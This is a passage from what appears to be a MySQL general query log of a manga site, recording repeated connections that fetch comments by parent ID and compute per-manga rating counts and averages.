330661513 Quit 330661514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661514 Query select * FROM comments where parent_id = '1104' 330661514 Quit 330661515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661515 Query select * FROM comments where parent_id = '1102' 330661515 Quit 330661516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330661516 Quit 330661517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330661517 Quit 330661518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330661518 Quit 330661519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330661519 Quit 330661520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330661520 Quit 330661521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330661521 Quit 330661522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330661522 Quit 330661523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330661523 Quit 330661524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330661524 Quit 330661525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330661525 Quit 330661526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330661526 Quit 330661527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330661527 Quit 330661528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330661528 Quit 330661529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330661529 Quit 330661530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330661530 Quit 330661531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330661531 Quit 330661532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330661532 Quit 330661533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330661533 Quit 330661534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330661534 Quit 330661535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330661535 Quit 330661536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330661536 Quit 330661537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330661537 Quit 330661538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330661538 Quit 330661539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330661539 Quit 330661540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330661540 Quit 330661541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330661541 Quit 330661542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330661542 Quit 330661543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330661543 Quit 330661544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330661544 Quit 330661545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330661545 Quit 330661546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330661546 Quit 330661547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330661547 Quit 330661548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330661548 Quit 330661549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330661549 Quit 330661550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330661550 Quit 330661551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330661551 Quit 330661552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330661552 Quit 330661553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330661553 Quit 330661554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330661554 Quit 330661555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330661555 Quit 330661556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330661556 Quit 330661557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330661557 Quit 330661558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330661558 Quit 330661559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330661559 Quit 330661560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330661560 Quit 330661561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330661561 Quit 330661562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330661562 Quit 330661563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330661563 Quit 330661564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330661564 Quit 330661565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330661565 Quit 330661566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330661566 Quit 330661567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330661567 Quit 330661568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330661568 Quit 330661569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330661569 Quit 330661570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330661570 Quit 330661571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330661571 Quit 330661572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330661572 Quit 330661573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330661573 Quit 330661574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330661574 Quit 330661575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330661575 Quit 330661576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330661576 Quit 330661577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330661577 Quit 330661578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330661578 Quit 330661579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330661579 Quit 330661580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330661580 Quit 330661581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330661581 Quit 330661582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330661582 Quit 330661583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330661583 Quit 330661584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330661584 Quit 330661585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330661585 Quit 330661586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330661586 Quit 330661587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330661587 Quit 330661588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330661588 Quit 330661589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330661589 Quit 330661590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330661590 Quit 330661591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330661591 Quit 330661592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330661592 Quit 330661593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330661593 Quit 330661594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330661594 Quit 330661595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330661595 Quit 330661596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330661596 Quit 330661597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330661597 Quit 330661598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330661598 Quit 330661599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330661599 Quit 330661600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330661600 Quit 330661601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330661601 Quit 330661602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330661602 Quit 330661603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330661603 Quit 330661604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330661604 Quit 330661605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330661605 Quit 330661606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330661606 Quit 330661607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330661607 Quit 330661608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330661608 Quit 330661609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330661609 Quit 330661610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330661610 Quit 330661611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330661611 Quit 330661612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330661612 Quit 330661613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330661613 Quit 330661614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330661614 Quit 330661615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330661615 Quit 330661616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330661616 Quit 330661617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330661617 Quit 330661618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330661618 Quit 330661619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330661619 Quit 330661620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330661620 Quit 330661621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330661621 Quit 330661622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330661622 Quit 330661623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330661623 Quit 330661624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330661624 Quit 330661625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330661625 Quit 330661626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330661626 Quit 330661627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330661627 Quit 330661628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330661628 Quit 330661629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330661629 Quit 330661630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330661630 Quit 330661631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330661631 Quit 330661632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330661632 Quit 330661633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330661633 Quit 330661634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330661634 Quit 330661635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330661635 Quit 330661636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330661636 Quit 330661637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330661637 Quit 330661638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330661638 Quit 330661639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330661639 Quit 330661640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330661640 Quit 330661641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330661641 Quit 330661642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330661642 Quit 330661643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330661643 Quit 330661644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330661644 Quit 330661645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330661645 Quit 330661646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330661646 Quit 330661647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330661647 Quit 330661648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330661648 Quit 330661649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330661649 Quit 330661650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330661650 Quit 330661651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330661651 Quit 330661652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330661652 Quit 330661653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330661653 Quit 330661654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330661654 Quit 330661655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330661655 Quit 330661656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330661656 Quit 330661657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330661657 Quit 330661658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330661658 Quit 330661659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330661659 Quit 330661660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330661660 Quit 330661661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330661661 Quit 330661662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330661662 Quit 330661663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330661663 Quit 330661664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330661664 Quit 330661665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330661665 Quit 330661666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330661666 Quit 330661667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661667 Query select count(id) as total_rating, (sum(rating) / 